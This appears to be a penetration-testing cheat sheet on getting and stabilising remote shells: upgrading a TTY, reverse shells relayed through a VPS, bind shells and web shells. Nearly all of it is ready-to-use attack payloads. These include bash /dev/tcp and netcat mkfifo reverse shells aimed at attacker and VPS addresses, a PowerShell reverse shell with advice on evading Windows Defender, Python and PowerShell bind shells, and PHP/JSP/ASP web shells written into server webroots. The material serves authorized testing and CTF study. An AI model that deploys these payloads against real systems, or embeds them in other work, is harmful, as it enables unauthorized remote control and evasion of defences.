USING ZSH
Using zsh instead of bash require a slight adjustment in session upgrade when calling bash in target terminal. Simply stty raw -echo and next fg doesn’t work, use a oneliner :
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl-Z
stty raw -echo ; fg
[Enter]
[Enter]
export TERM={your host TERM}Reverse Shell
Easiest to trigger among Bind Shell and Web Shell. You upload or overwrite a file you can execute remotely, or execute command on target for them to instantiate a connection to you. Beforehand you setup a listener on your host for it to accept the incoming connection.
Connect Back IP
You need to make sure your listening machine has a reachable IP for the target. Either you’re on the same private network, or you have a VPS to pivot from it to your host (which you can connect to). If you are directly reachable by the target, you can use your own IP by avoiding the following setup :
VPS is great
By forwarding the VPS connection to your host using the SSH tunnel, the target will only see the VPS IP and not yours. This solution is great for hiding your real host;
Setup example of VPS remote port forwarding :
- On host (forward port 9000 connection to the VPS to the host 4444 port using SSH)
ssh -R 9000:localhost:4444 user@vpsnc -lvp 4444- On VPS :
nc -lvp 9000- On target (check for payload list depending on target at shells) :
bash -i >& /dev/tcp/VPS_IP/9000 0>&1Reverse Shell Command
Usual payload to upload on machine target :
bash -c 'bash -i >& /dev/tcp/<insert attacker IP>/1234 0>&1'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/fWindows Defender
This Powershell payload is flagged by windows defender, you need to tweak the content for it to work.
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"Bind Shell
Opposite of the Reverse Shell, where you are the one connecting to the target which is listening. Payload is mainly the same as reverse shell however the parameters must be adapted to match the changes. A bind shell’s advantage is the possibility to drop our connection and connect again as the target is still listening, contrarely to a revshell where you would need to reproduce the exploit again.
Netcat Connection
As the target is the one receiving us this time, the Netcat command we’re using is
nc <target IP> <target port>Bind Shell Command
Usual payload to upload on machine target :
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/fpython -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();Web Shell
Web Shell are great if the server configuration disallow commands like Bash, Python, Netcat or sh. If the server is under noexec option it will also prevent use of commands (but you can still do so with a Web Shell if the commands are being triggered through a PHP or Python process if no options are supplied on it like disable_functions).
Many more features can block a remote shell (reverse or blind), which is where Web Shell comes in handy. They can be used by injecting payload on unsanitized parameters in GET or POST request that end up being added to a command.
Writing a Web Shell
Examples of web shell payloads :
<?php system($_REQUEST["cmd"]); ?><% Runtime.getRuntime().exec(request.getParameter("cmd")); %><% eval request("cmd") %>Uploading a Web Shell
If you’re able to upload file reachable afterwards and are executed like in PHP, you can effectively return command output you supply. If you already have RCE but under constraints, you can create the file under the webroot directory. This allows to have a more stable and possibly less restricted command execution through the written file. The webroot depends on the server behind, which lead us back to the importance of service scanning.
| Web Server | Default Webroot |
|---|---|
Apache | /var/www/html/ |
Nginx | /usr/local/nginx/html/ |
IIS | c:\inetpub\wwwroot| |
XAMPP | C:\xampp\htdocs| |
| A typical malicious php file would be written with this payload : |
echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.phpAccessing Web Shell
Request the vulnerable file through browser or cURL and add the cmd you wish to execute through the cmd parameter. The output will appear on the response, rince and repeat as needed.